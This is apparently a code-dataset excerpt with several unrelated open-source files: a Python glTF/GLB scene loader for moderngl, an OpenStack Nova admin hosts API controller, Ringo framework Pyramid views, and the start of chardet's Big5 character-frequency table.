Parse the json file and validate its contents.
No actual data loading will happen.
Supported formats:
- gltf json format with external resources
- gltf embedded buffers
- glb Binary format
"""
super().__init__(meta)
self.scenes = []
self.nodes = []
self.meshes = []
self.materials = []
self.images = []
self.samplers = []
self.textures = []
self.path = None
self.scene = None
def load(self):
"""
Deferred loading of the scene
:param scene: The scene object
:param file: Resolved path if changed by finder
"""
self.path = self.find_scene(self.meta.path)
if not self.path:
raise ValueError("Scene '{}' not found".format(self.meta.path))
self.scene = Scene(self.path)
# Load gltf json file
if self.path.suffix == '.gltf':
self.load_gltf()
# Load binary gltf file
if self.path.suffix == '.glb':
self.load_glb()
self.meta.check_version()
self.meta.check_extensions(self.supported_extensions)
self.load_images()
self.load_samplers()
self.load_textures()
self.load_materials()
self.load_meshes()
self.load_nodes()
self.scene.calc_scene_bbox()
self.scene.prepare()
return self.scene
def load_gltf(self):
"""Loads a gltf json file"""
with open(self.path) as fd:
self.meta = GLTFMeta(self.path, json.load(fd))
def load_glb(self):
"""Loads a binary gltf file"""
with open(self.path, 'rb') as fd:
# Check header
magic = fd.read(4)
if magic != GLTF_MAGIC_HEADER:
raise ValueError("{} has incorrect header {} != {}".format(self.path, magic, GLTF_MAGIC_HEADER))
version = struct.unpack('<I', fd.read(4))[0]
if version != 2:
raise ValueError("{} has unsupported version {}".format(self.path, version))
# Total file size including headers
_ = struct.unpack('<I', fd.read(4))[0] # noqa
# Chunk 0 - json
chunk_0_length = struct.unpack('<I', fd.read(4))[0]
chunk_0_type = fd.read(4)
if chunk_0_type != b'JSON':
raise ValueError("Expected JSON chunk, not {} in file {}".format(chunk_0_type, self.path))
json_meta = fd.read(chunk_0_length).decode()
# chunk 1 - binary buffer
chunk_1_length = struct.unpack('<I', fd.read(4))[0]
chunk_1_type = fd.read(4)
if chunk_1_type != b'BIN\x00':
raise ValueError("Expected BIN chunk, not {} in file {}".format(chunk_1_type, self.path))
self.meta = GLTFMeta(self.path, json.loads(json_meta), binary_buffer=fd.read(chunk_1_length))
def load_images(self):
for image in self.meta.images:
self.images.append(image.load(self.path.parent))
def load_samplers(self):
for sampler in self.meta.samplers:
# NOTE: Texture wrap will be changed in moderngl 6.x
# We currently only have repeat values
self.samplers.append(
self.ctx.sampler(
filter=(sampler.minFilter, sampler.magFilter),
repeat_x=sampler.wrapS in [REPEAT, MIRRORED_REPEAT],
repeat_y=sampler.wrapT in [REPEAT, MIRRORED_REPEAT],
anisotropy=16.0,
)
)
def load_textures(self):
for texture_meta in self.meta.textures:
texture = MaterialTexture()
if texture_meta.source is not None:
texture.texture = self.images[texture_meta.source]
if texture_meta.sampler is not None:
texture.sampler = self.samplers[texture_meta.sampler]
self.textures.append(texture)
def load_meshes(self):
for meta_mesh in self.meta.meshes:
# Returns a list of meshes
meshes = meta_mesh.load(self.materials)
self.meshes.append(meshes)
for mesh in meshes:
self.scene.meshes.append(mesh)
def load_materials(self):
# Create material objects
for meta_mat in self.meta.materials:
mat = Material(meta_mat.name)
mat.color = meta_mat.baseColorFactor
mat.double_sided = meta_mat.doubleSided
if meta_mat.baseColorTexture is not None:
mat.mat_texture = self.textures[meta_mat.baseColorTexture['index']]
self.materials.append(mat)
self.scene.materials.append(mat)
def load_nodes(self):
# Start with root nodes in the scene
for node_id in self.meta.scenes[0].nodes:
node = self.load_node(self.meta.nodes[node_id])
self.scene.root_nodes.append(node)
def load_node(self, meta, parent=None):
# Create the node
node = Node()
self.scene.nodes.append(node)
if meta.matrix is not None:
node.matrix = Matrix44(value=meta.matrix)
if meta.mesh is not None:
# Since we split up meshes with multiple primitives, this can be a list
# If only one mesh we set it on the node as normal
if len(self.meshes[meta.mesh]) == 1:
node.mesh = self.meshes[meta.mesh][0]
# If multiple meshes we add them as new child node
elif len(self.meshes[meta.mesh]) > 1:
for mesh in self.meshes[meta.mesh]:
node.add_child(Node(mesh=mesh))
if meta.camera is not None:
# FIXME: Use a proper camera class
node.camera = self.meta.cameras[meta.camera]
if parent:
parent.add_child(node)
# Follow children
if meta.has_children:
for node_id in meta.children:
self.load_node(self.meta.nodes[node_id], parent=node)
return node
class GLTFMeta:
"""Container for gltf metadata"""
def __init__(self, path, data, binary_buffer=None):
"""
:param file: GLTF file name loaded
:param data: Metadata (json loaded)
:param binary_buffer: Binary buffer when loading glb files
"""
self.data = data
self.path = path
self.asset = GLTFAsset(data['asset'])
self.materials = [GLTFMaterial(m) for m in data['materials']] if data.get('materials') else []
self.images = [GLTFImage(i) for i in data['images']] if data.get('images') else []
self.samplers = [GLTFSampler(s) for s in data['samplers']] if data.get('samplers') else []
self.textures = [GLTFTexture(t) for t in data['textures']] if data.get('textures') else []
self.scenes = [GLTFScene(s) for s in data['scenes']] if data.get('scenes') else []
self.nodes = [GLTFNode(n) for n in data['nodes']] if data.get('nodes') else []
self.meshes = [GLTFMesh(m) for m in data['meshes']] if data.get('meshes') else []
self.cameras = [GLTFCamera(c) for c in data['cameras']] if data.get('cameras') else []
self.buffer_views = [GLTFBufferView(i, v) for i, v in enumerate(data['bufferViews'])] \
if data.get('bufferViews') else []
self.buffers = [GLTFBuffer(i, b, self.path.parent) for i, b in enumerate(data['buffers'])] \
if data.get('buffers') else []
self.accessors = [GLTFAccessor(i, a) for i, a in enumerate(data['accessors'])] \
if data.get('accessors') else []
# glb files can contain buffer 0 data
if binary_buffer:
self.buffers[0].data = binary_buffer
self._link_data()
self.buffers_exist()
self.images_exist()
def _link_data(self):
"""Add references"""
# accessors -> buffer_views -> buffers
for acc in self.accessors:
acc.bufferView = self.buffer_views[acc.bufferViewId]
for buffer_view in self.buffer_views:
buffer_view.buffer = self.buffers[buffer_view.bufferId]
# Link accessors to mesh primitives
for mesh in self.meshes:
for primitive in mesh.primitives:
if getattr(primitive, "indices", None) is not None:
primitive.indices = self.accessors[primitive.indices]
for name, value in primitive.attributes.items():
primitive.attributes[name] = self.accessors[value]
# Link buffer views to images
for image in self.images:
if image.bufferViewId is not None:
image.bufferView = self.buffer_views[image.bufferViewId]
@property
def version(self):
return self.asset.version
def check_version(self, required='2.0'):
if not self.version == required:
msg = "GLTF Format version is not 2.0. Version states '{}' in file {}".format(
self.version,
self.path,
)
raise ValueError(msg)
def check_extensions(self, supported):
"""
"extensionsRequired": ["KHR_draco_mesh_compression"],
"extensionsUsed": ["KHR_draco_mesh_compression"]
"""
if self.data.get('extensionsRequired'):
for ext in self.data.get('extensionsRequired'):
if ext not in supported:
raise ValueError("Extension {} not supported".format(ext))
if self.data.get('extensionsUsed'):
for ext in self.data.get('extensionsUsed'):
if ext not in supported:
raise ValueError("Extension {} not supported".format(ext))
def buffers_exist(self):
"""Checks if the bin files referenced exist"""
for buff in self.buffers:
if not buff.is_separate_file:
continue
path = self.path.parent / buff.uri
if not os.path.exists(path):
raise FileNotFoundError("Buffer {} referenced in {} not found".format(path, self.path))
def images_exist(self):
"""checks if the images references in textures exist"""
pass
class GLTFAsset:
"""Asset Information"""
def __init__(self, data):
self.version = data.get('version')
self.generator = data.get('generator')
self.copyright = data.get('copyright')
class GLTFMesh:
def __init__(self, data):
class Primitives:
def __init__(self, data):
self.attributes = data.get('attributes')
self.indices = data.get('indices')
self.mode = data.get('mode')
self.material = data.get('material')
self.name = data.get('name')
self.primitives = [Primitives(p) for p in data.get('primitives')]
def load(self, materials):
name_map = {
'POSITION': 'in_position',
'NORMAL': 'in_normal',
'TEXCOORD_0': 'in_uv',
'TANGENT': 'in_tangent',
'JOINTS_0': 'in_joints',
'WEIGHTS_0': 'in_heights',
'COLOR_0': 'in_color0',
}
meshes = []
# Read all primitives as separate meshes for now
# According to the spec they can have different materials and vertex format
for primitive in self.primitives:
vao = VAO(self.name, mode=primitive.mode or moderngl.TRIANGLES)
# Index buffer
component_type, index_vbo = self.load_indices(primitive)
if index_vbo is not None:
vao.index_buffer(context.ctx().buffer(index_vbo.tobytes()),
index_element_size=component_type.size)
attributes = {}
vbos = self.prepare_attrib_mapping(primitive)
for vbo_info in vbos:
dtype, buffer = vbo_info.create()
vao.buffer(
buffer,
" ".join(["{}{}".format(attr[1], DTYPE_BUFFER_TYPE[dtype]) for attr in vbo_info.attributes]),
[name_map[attr[0]] for attr in vbo_info.attributes],
)
for attr in vbo_info.attributes:
attributes[attr[0]] = {
'name': name_map[attr[0]],
'components': attr[1],
'type': vbo_info.component_type.value,
}
bbox_min, bbox_max = self.get_bbox(primitive)
meshes.append(Mesh(
self.name, vao=vao, attributes=attributes,
material=materials[primitive.material] if primitive.material is not None else None,
bbox_min=bbox_min, bbox_max=bbox_max,
))
return meshes
def load_indices(self, primitive):
"""Loads the index buffer / polygon list for a primitive"""
if getattr(primitive, "indices") is None:
return None, None
_, component_type, buffer = primitive.indices.read()
return component_type, buffer
def prepare_attrib_mapping(self, primitive):
"""Pre-parse buffer mappings for each VBO to detect interleaved data for a primitive"""
buffer_info = []
for name, accessor in primitive.attributes.items():
info = VBOInfo(*accessor.info())
info.attributes.append((name, info.components))
if buffer_info and buffer_info[-1].buffer_view == info.buffer_view:
if buffer_info[-1].interleaves(info):
buffer_info[-1].merge(info)
continue
buffer_info.append(info)
return buffer_info
def get_bbox(self, primitive):
"""Get the bounding box for the mesh"""
accessor = primitive.attributes.get('POSITION')
return accessor.min, accessor.max
class VBOInfo:
"""Resolved data about each VBO"""
def __init__(self, buffer=None, buffer_view=None,
byte_length=None, byte_offset=None,
component_type=None, components=None, count=None):
self.buffer = buffer # reference to the buffer
self.buffer_view = buffer_view
self.byte_length = byte_length # Raw byte buffer length
self.byte_offset = byte_offset # Raw byte offset
self.component_type = component_type # Datatype of each component
self.components = components
self.count = count # number of elements of the component type size
# list of (name, components) tuples
self.attributes = []
def interleaves(self, info):
"""Does the buffer interleave with this one?"""
return info.byte_offset == self.component_type.size * self.components
def merge(self, info):
# NOTE: byte length is the same
self.components += info.components
self.attributes += info.attributes
def create(self):
"""Create the VBO"""
dtype = NP_COMPONENT_DTYPE[self.component_type.value]
data = numpy.frombuffer(
self.buffer.read(byte_length=self.byte_length, byte_offset=self.byte_offset),
count=self.count * self.components,
dtype=dtype,
)
return dtype, data
def __str__(self):
return "VBOInfo<buffer={}, buffer_view={},\n" \
" length={}, offset={}, \n" \
" component_type={}, components={}, count={}, \n" \
" attribs={}".format(self.buffer.id, self.buffer_view.id, self.target,
self.byte_length, self.byte_offset,
self.component_type.value, self.components, self.count,
self.attributes)
def __repr__(self):
return str(self)
class GLTFAccessor:
def __init__(self, accessor_id, data):
self.id = accessor_id
self.bufferViewId = data.get('bufferView') or 0
self.bufferView = None
self.byteOffset = data.get('byteOffset') or 0
self.componentType = COMPONENT_TYPE[data['componentType']]
self.count = data.get('count')
self.min = numpy.array(data.get('min') or [-0.5, -0.5, -0.5], dtype=numpy.float32)
self.max = numpy.array(data.get('max') or [0.5, 0.5, 0.5], dtype=numpy.float32)
self.type = data.get('type')
def read(self):
"""
Reads buffer data
:return: component count, component type, data
"""
# ComponentType helps us determine the datatype
dtype = NP_COMPONENT_DTYPE[self.componentType.value]
return ACCESSOR_TYPE[self.type], self.componentType, self.bufferView.read(
byte_offset=self.byteOffset,
dtype=dtype,
count=self.count * ACCESSOR_TYPE[self.type],
)
def info(self):
"""
Get underlying buffer info for this accessor
:return: buffer, byte_length, byte_offset, component_type, count
"""
buffer, byte_length, byte_offset = self.bufferView.info(byte_offset=self.byteOffset)
return buffer, self.bufferView, \
byte_length, byte_offset, \
self.componentType, ACCESSOR_TYPE[self.type], self.count
class GLTFBufferView:
def __init__(self, view_id, data):
self.id = view_id
self.bufferId = data.get('buffer')
self.buffer = None
self.byteOffset = data.get('byteOffset') or 0
self.byteLength = data.get('byteLength')
self.byteStride = data.get('byteStride') or 0
# Valid: 34962 (ARRAY_BUFFER) and 34963 (ELEMENT_ARRAY_BUFFER) or None
def read(self, byte_offset=0, dtype=None, count=0):
data = self.buffer.read(
byte_offset=byte_offset + self.byteOffset,
byte_length=self.byteLength,
)
vbo = numpy.frombuffer(data, count=count, dtype=dtype)
return vbo
def read_raw(self):
return self.buffer.read(byte_length=self.byteLength, byte_offset=self.byteOffset)
def info(self, byte_offset=0):
"""
Get the underlying buffer info
:param byte_offset: byte offset from accessor
:return: buffer, byte_length, byte_offset
"""
return self.buffer, self.byteLength, byte_offset + self.byteOffset
class GLTFBuffer:
def __init__(self, buffer_id, data, path):
self.id = buffer_id
self.path = path
self.byteLength = data.get('byteLength')
self.uri = data.get('uri')
self.data = None
@property
def has_data_uri(self):
"""Is data embedded in json?"""
if not self.uri:
return False
return self.uri.startswith("data:")
@property
def is_separate_file(self):
"""Buffer represents an independent bin file?"""
return self.uri is not None and not self.has_data_uri
def open(self):
if self.data:
return
if self.has_data_uri:
self.data = base64.b64decode(self.uri[self.uri.find(',') + 1:])
return
with open(self.path / self.uri, 'rb') as fd:
self.data = fd.read()
def read(self, byte_offset=0, byte_length=0):
self.open()
return self.data[byte_offset:byte_offset + byte_length]
class GLTFScene:
def __init__(self, data):
self.nodes = data['nodes']
class GLTFNode:
def __init__(self, data):
self.children = data.get('children')
self.matrix = data.get('matrix')
self.mesh = data.get('mesh')
self.camera = data.get('camera')
self.translation = data.get('translation')
self.rotation = data.get('rotation')
self.scale = data.get('scale')
if self.matrix is None:
self.matrix = matrix44.create_identity()
if self.translation is not None:
self.matrix = matrix44.create_from_translation(self.translation)
if self.rotation is not None:
quat = quaternion.create(self.rotation[0], self.rotation[1], self.rotation[2], self.rotation[3])
mat = matrix44.create_from_quaternion(quat)
self.matrix = matrix44.multiply(mat, self.matrix)
if self.scale is not None:
self.matrix = matrix44.multiply(matrix44.create_from_scale(self.scale), self.matrix)
@property
def has_children(self):
return self.children is not None and len(self.children) > 0
@property
def is_resource_node(self):
"""Is this just a reference node to a resource?"""
return self.camera is not None or self.mesh is not None
class GLTFMaterial:
def __init__(self, data):
self.name = data.get('name')
# Defaults to true if not defined
self.doubleSided = data.get('doubleSided') or True
pbr = data['pbrMetallicRoughness']
self.baseColorFactor = pbr.get('baseColorFactor')
self.baseColorTexture = pbr.get('baseColorTexture')
self.metallicFactor = pbr.get('metallicFactor')
self.emissiveFactor = data.get('emissiveFactor')
class GLTFImage:
"""
Represent texture data.
May be a file, embedded data or pointer to data in bufferview
"""
def __init__(self, data):
self.uri = data.get('uri')
self.bufferViewId = data.get('bufferView')
self.bufferView = None
self.mimeType = data.get('mimeType')
def load(self, path):
# data:image/png;base64,iVBOR
# Image is stored in bufferView
if self.bufferView is not None:
image = Image.open(io.BytesIO(self.bufferView.read_raw()))
# Image is embedded
elif self.uri and self.uri.startswith('data:'):
data = self.uri[self.uri.find(',') + 1:]
image = Image.open(io.BytesIO(base64.b64decode(data)))
else:
path = path / self.uri
print("Loading:", self.uri)
image = Image.open(path)
texture = t2d.Loader(TextureDescription(
label="gltf",
image=image,
flip=False,
mipmap=True,
)).load()
return texture
class GLTFTexture:
def __init__(self, data):
self.sampler = data.get('sampler')
self.source = data.get('source')
class GLTFSampler:
def __init__(self, data):
self.magFilter = data.get('magFilter')
self.minFilter = data.get('minFilter')
self.wrapS = data.get('wrapS')
self.wrapT = data.get('wrapT')
class GLTFCamera:
def __init__(self, data):
self.data = data
# "perspective": {
# "aspectRatio": 1.0,
# "yfov": 0.266482561826706,
# "zfar": 1000000.0,
# "znear": 0.04999999701976776
# },
# "type": "perspective"
| isc |
tanglei528/nova | nova/api/openstack/compute/plugins/v3/hosts.py | 13 | 13924 | # Copyright (c) 2011 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""The hosts admin extension."""
import webob.exc
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
from nova import compute
from nova import exception
from nova.openstack.common.gettextutils import _
from nova.openstack.common import log as logging
LOG = logging.getLogger(__name__)
ALIAS = 'os-hosts'
authorize = extensions.extension_authorizer('compute', 'v3:' + ALIAS)
class HostController(wsgi.Controller):
"""The Hosts API controller for the OpenStack API."""
def __init__(self):
self.api = compute.HostAPI()
super(HostController, self).__init__()
@extensions.expected_errors(())
def index(self, req):
""":returns: A dict in the format:
{'hosts': [{'host_name': 'some.host.name',
'service': 'cells',
'zone': 'internal'},
{'host_name': 'some.other.host.name',
'service': 'cells',
'zone': 'internal'},
{'host_name': 'some.celly.host.name',
'service': 'cells',
'zone': 'internal'},
{'host_name': 'console1.host.com',
'service': 'consoleauth',
'zone': 'internal'},
{'host_name': 'network1.host.com',
'service': 'network',
'zone': 'internal'},
{'host_name': 'netwwork2.host.com',
'service': 'network',
'zone': 'internal'},
{'host_name': 'compute1.host.com',
'service': 'compute',
'zone': 'nova'},
{'host_name': 'compute2.host.com',
'service': 'compute',
'zone': 'nova'},
{'host_name': 'sched1.host.com',
'service': 'scheduler',
'zone': 'internal'},
{'host_name': 'sched2.host.com',
'service': 'scheduler',
'zone': 'internal'},
{'host_name': 'vol1.host.com',
'service': 'volume'},
'zone': 'internal']}
"""
context = req.environ['nova.context']
authorize(context)
filters = {'disabled': False}
zone = req.GET.get('zone', None)
if zone:
filters['availability_zone'] = zone
service = req.GET.get('service')
if service:
filters['topic'] = service
services = self.api.service_get_all(context, filters=filters,
set_zones=True)
hosts = []
for service in services:
hosts.append({'host_name': service['host'],
'service': service['topic'],
'zone': service['availability_zone']})
return {'hosts': hosts}
@extensions.expected_errors((400, 404, 501))
def update(self, req, id, body):
""":param body: example format {'host': {'status': 'enable',
'maintenance_mode': 'enable'}}
:returns:
"""
def read_enabled(orig_val, msg):
""":param orig_val: A string with either 'enable' or 'disable'. May
be surrounded by whitespace, and case doesn't
matter
:param msg: The message to be passed to HTTPBadRequest. A single
%s will be replaced with orig_val.
:returns: True for 'enabled' and False for 'disabled'
"""
val = orig_val.strip().lower()
if val == "enable":
return True
elif val == "disable":
return False
else:
raise webob.exc.HTTPBadRequest(explanation=msg % orig_val)
context = req.environ['nova.context']
authorize(context)
# See what the user wants to 'update'
if not self.is_valid_body(body, 'host'):
raise webob.exc.HTTPBadRequest(
explanation=_("The request body invalid"))
params = dict([(k.strip().lower(), v)
for k, v in body['host'].iteritems()])
orig_status = status = params.pop('status', None)
orig_maint_mode = maint_mode = params.pop('maintenance_mode', None)
# Validate the request
if len(params) > 0:
# Some extra param was passed. Fail.
explanation = _("Invalid update setting: '%s'") % params.keys()[0]
raise webob.exc.HTTPBadRequest(explanation=explanation)
if orig_status is not None:
status = read_enabled(orig_status, _("Invalid status: '%s'"))
if orig_maint_mode is not None:
maint_mode = read_enabled(orig_maint_mode, _("Invalid mode: '%s'"))
if status is None and maint_mode is None:
explanation = _("'status' or 'maintenance_mode' needed for "
"host update")
raise webob.exc.HTTPBadRequest(explanation=explanation)
# Make the calls and merge the results
result = {'host': id}
if status is not None:
result['status'] = self._set_enabled_status(context, id, status)
if maint_mode is not None:
result['maintenance_mode'] = self._set_host_maintenance(context,
id,
maint_mode)
return {'host': result}
def _set_host_maintenance(self, context, host_name, mode=True):
"""Start/Stop host maintenance window. On start, it triggers
guest VMs evacuation.
"""
LOG.audit(_("Putting host %(host_name)s in maintenance mode "
"%(mode)s."),
{'host_name': host_name, 'mode': mode})
try:
result = self.api.set_host_maintenance(context, host_name, mode)
except NotImplementedError:
msg = _("Virt driver does not implement host maintenance mode.")
raise webob.exc.HTTPNotImplemented(explanation=msg)
except exception.HostNotFound as e:
raise webob.exc.HTTPNotFound(explanation=e.format_message())
except exception.ComputeServiceUnavailable as e:
raise webob.exc.HTTPBadRequest(explanation=e.format_message())
if result not in ("on_maintenance", "off_maintenance"):
raise webob.exc.HTTPBadRequest(explanation=result)
return result
def _set_enabled_status(self, context, host_name, enabled):
"""Sets the specified host's ability to accept new instances.
:param enabled: a boolean - if False no new VMs will be able to start
on the host.
"""
if enabled:
LOG.audit(_("Enabling host %s.") % host_name)
else:
LOG.audit(_("Disabling host %s.") % host_name)
try:
result = self.api.set_host_enabled(context, host_name=host_name,
enabled=enabled)
except NotImplementedError:
msg = _("Virt driver does not implement host disabled status.")
raise webob.exc.HTTPNotImplemented(explanation=msg)
except exception.HostNotFound as e:
raise webob.exc.HTTPNotFound(explanation=e.format_message())
except exception.ComputeServiceUnavailable as e:
raise webob.exc.HTTPBadRequest(explanation=e.format_message())
if result not in ("enabled", "disabled"):
raise webob.exc.HTTPBadRequest(explanation=result)
return result
def _host_power_action(self, req, host_name, action):
"""Reboots, shuts down or powers up the host."""
context = req.environ['nova.context']
authorize(context)
try:
result = self.api.host_power_action(context, host_name=host_name,
action=action)
except NotImplementedError:
msg = _("Virt driver does not implement host power management.")
raise webob.exc.HTTPNotImplemented(explanation=msg)
except exception.HostNotFound as e:
raise webob.exc.HTTPNotFound(explanation=e.format_message())
except exception.ComputeServiceUnavailable as e:
raise webob.exc.HTTPBadRequest(explanation=e.format_message())
return {"host": {"host": host_name,
"power_action": result}}
@extensions.expected_errors((400, 404, 501))
def startup(self, req, id):
return self._host_power_action(req, host_name=id, action="startup")
@extensions.expected_errors((400, 404, 501))
def shutdown(self, req, id):
return self._host_power_action(req, host_name=id, action="shutdown")
@extensions.expected_errors((400, 404, 501))
def reboot(self, req, id):
return self._host_power_action(req, host_name=id, action="reboot")
@staticmethod
def _get_total_resources(host_name, compute_node):
return {'resource': {'host': host_name,
'project': '(total)',
'cpu': compute_node['vcpus'],
'memory_mb': compute_node['memory_mb'],
'disk_gb': compute_node['local_gb']}}
@staticmethod
def _get_used_now_resources(host_name, compute_node):
return {'resource': {'host': host_name,
'project': '(used_now)',
'cpu': compute_node['vcpus_used'],
'memory_mb': compute_node['memory_mb_used'],
'disk_gb': compute_node['local_gb_used']}}
@staticmethod
def _get_resource_totals_from_instances(host_name, instances):
cpu_sum = 0
mem_sum = 0
hdd_sum = 0
for instance in instances:
cpu_sum += instance['vcpus']
mem_sum += instance['memory_mb']
hdd_sum += instance['root_gb'] + instance['ephemeral_gb']
return {'resource': {'host': host_name,
'project': '(used_max)',
'cpu': cpu_sum,
'memory_mb': mem_sum,
'disk_gb': hdd_sum}}
@staticmethod
def _get_resources_by_project(host_name, instances):
# Getting usage resource per project
project_map = {}
for instance in instances:
resource = project_map.setdefault(instance['project_id'],
{'host': host_name,
'project': instance['project_id'],
'cpu': 0,
'memory_mb': 0,
'disk_gb': 0})
resource['cpu'] += instance['vcpus']
resource['memory_mb'] += instance['memory_mb']
resource['disk_gb'] += (instance['root_gb'] +
instance['ephemeral_gb'])
return project_map
@extensions.expected_errors((403, 404))
def show(self, req, id):
"""Shows the physical/usage resource given by hosts.
:param id: hostname
:returns: expected to use HostShowTemplate.
ex.::
{'host': {'resource':D},..}
D: {'host': 'hostname','project': 'admin',
'cpu': 1, 'memory_mb': 2048, 'disk_gb': 30}
"""
context = req.environ['nova.context']
authorize(context)
host_name = id
try:
service = self.api.service_get_by_compute_host(context, host_name)
except exception.ComputeHostNotFound as e:
raise webob.exc.HTTPNotFound(explanation=e.format_message())
except exception.AdminRequired:
# TODO(Alex Xu): The authorization is done by policy,
# db layer checking is needless. The db layer checking should
# be removed
msg = _("Describe-resource is admin only functionality")
raise webob.exc.HTTPForbidden(explanation=msg)
compute_node = service['compute_node']
instances = self.api.instance_get_all_by_host(context, host_name)
resources = [self._get_total_resources(host_name, compute_node)]
resources.append(self._get_used_now_resources(host_name,
compute_node))
resources.append(self._get_resource_totals_from_instances(host_name,
instances))
by_proj_resources = self._get_resources_by_project(host_name,
instances)
for resource in by_proj_resources.itervalues():
resources.append({'resource': resource})
return {'host': resources}
class Hosts(extensions.V3APIExtensionBase):
"""Admin-only host administration."""
name = "Hosts"
alias = ALIAS
version = 1
def get_resources(self):
resources = [extensions.ResourceExtension('os-hosts',
HostController(),
member_actions={"startup": "GET", "shutdown": "GET",
"reboot": "GET"})]
return resources
def get_controller_extensions(self):
return []
| apache-2.0 |
ringo-framework/ringo | ringo/views/home.py | 3 | 1347 | import pkg_resources
from pyramid.view import view_config
from ringo.lib.helpers import (
get_ringo_version,
get_app_version,
get_app_name,
get_app_title
)
from ringo.lib.renderer import (
DTListRenderer
)
@view_config(route_name='home', renderer='/index.mako')
def index_view(request):
values = {}
return values
@view_config(route_name='about', renderer='/about.mako')
def about_view(request):
values = {}
values['app_title'] = get_app_title()
return values
@view_config(route_name='contact', renderer='/contact.mako')
def contact_view(request):
return {}
@view_config(route_name='version', renderer='/version.mako')
def version_view(request):
# Fetch the versions of some Packages
# Ringo
values = {}
formbar_pkg = pkg_resources.get_distribution('formbar')
sqla_pkg = pkg_resources.get_distribution('sqlalchemy')
pyramid_pkg = pkg_resources.get_distribution('pyramid')
values['app_title'] = get_app_title()
values['app_version'] = get_app_version()
values['app_name'] = get_app_name()
values['ringo_version'] = get_ringo_version()
values['app_version'] = get_app_version()
values['formbar_version'] = formbar_pkg.version
values['sqlalchemy_version'] = sqla_pkg.version
values['pyramid_version'] = pyramid_pkg.version
return values
| gpl-2.0 |
mottosso/be | be/vendor/requests/packages/chardet/big5freq.py | 3133 | 82594 | ######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Communicator client code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
# Big5 frequency table
# by Taiwan's Mandarin Promotion Council
# <http://www.edu.tw:81/mandr/>
#
# 128 --> 0.42261
# 256 --> 0.57851
# 512 --> 0.74851
# 1024 --> 0.89384
# 2048 --> 0.97583
#
# Ideal Distribution Ratio = 0.74851/(1-0.74851) =2.98
# Random Distribution Ration = 512/(5401-512)=0.105
#
# Typical Distribution Ratio about 25% of Ideal one, still much higher than RDR
BIG5_TYPICAL_DISTRIBUTION_RATIO = 0.75
#Char to FreqOrder table
BIG5_TABLE_SIZE = 5376
Big5CharToFreqOrder = (
1,1801,1506, 255,1431, 198, 9, 82, 6,5008, 177, 202,3681,1256,2821, 110, # 16
3814, 33,3274, 261, 76, 44,2114, 16,2946,2187,1176, 659,3971, 26,3451,2653, # 32
1198,3972,3350,4202, 410,2215, 302, 590, 361,1964, 8, 204, 58,4510,5009,1932, # 48
63,5010,5011, 317,1614, 75, 222, 159,4203,2417,1480,5012,3555,3091, 224,2822, # 64
3682, 3, 10,3973,1471, 29,2787,1135,2866,1940, 873, 130,3275,1123, 312,5013, # 80
4511,2052, 507, 252, 682,5014, 142,1915, 124, 206,2947, 34,3556,3204, 64, 604, # 96
5015,2501,1977,1978, 155,1991, 645, 641,1606,5016,3452, 337, 72, 406,5017, 80, # 112
630, 238,3205,1509, 263, 939,1092,2654, 756,1440,1094,3453, 449, 69,2987, 591, # 128
179,2096, 471, 115,2035,1844, 60, 50,2988, 134, 806,1869, 734,2036,3454, 180, # 144
995,1607, 156, 537,2907, 688,5018, 319,1305, 779,2145, 514,2379, 298,4512, 359, # 160
2502, 90,2716,1338, 663, 11, 906,1099,2553, 20,2441, 182, 532,1716,5019, 732, # 176
1376,4204,1311,1420,3206, 25,2317,1056, 113, 399, 382,1950, 242,3455,2474, 529, # 192
3276, 475,1447,3683,5020, 117, 21, 656, 810,1297,2300,2334,3557,5021, 126,4205, # 208
706, 456, 150, 613,4513, 71,1118,2037,4206, 145,3092, 85, 835, 486,2115,1246, # 224
1426, 428, 727,1285,1015, 800, 106, 623, 303,1281,5022,2128,2359, 347,3815, 221, # 240
3558,3135,5023,1956,1153,4207, 83, 296,1199,3093, 192, 624, 93,5024, 822,1898, # 256
2823,3136, 795,2065, 991,1554,1542,1592, 27, 43,2867, 859, 139,1456, 860,4514, # 272
437, 712,3974, 164,2397,3137, 695, 211,3037,2097, 195,3975,1608,3559,3560,3684, # 288
3976, 234, 811,2989,2098,3977,2233,1441,3561,1615,2380, 668,2077,1638, 305, 228, # 304
1664,4515, 467, 415,5025, 262,2099,1593, 239, 108, 300, 200,1033, 512,1247,2078, # 320
5026,5027,2176,3207,3685,2682, 593, 845,1062,3277, 88,1723,2038,3978,1951, 212, # 336
266, 152, 149, 468,1899,4208,4516, 77, 187,5028,3038, 37, 5,2990,5029,3979, # 352
5030,5031, 39,2524,4517,2908,3208,2079, 55, 148, 74,4518, 545, 483,1474,1029, # 368
1665, 217,1870,1531,3138,1104,2655,4209, 24, 172,3562, 900,3980,3563,3564,4519, # 384
32,1408,2824,1312, 329, 487,2360,2251,2717, 784,2683, 4,3039,3351,1427,1789, # 400
188, 109, 499,5032,3686,1717,1790, 888,1217,3040,4520,5033,3565,5034,3352,1520, # 416
3687,3981, 196,1034, 775,5035,5036, 929,1816, 249, 439, 38,5037,1063,5038, 794, # 432
3982,1435,2301, 46, 178,3278,2066,5039,2381,5040, 214,1709,4521, 804, 35, 707, # 448
324,3688,1601,2554, 140, 459,4210,5041,5042,1365, 839, 272, 978,2262,2580,3456, # 464
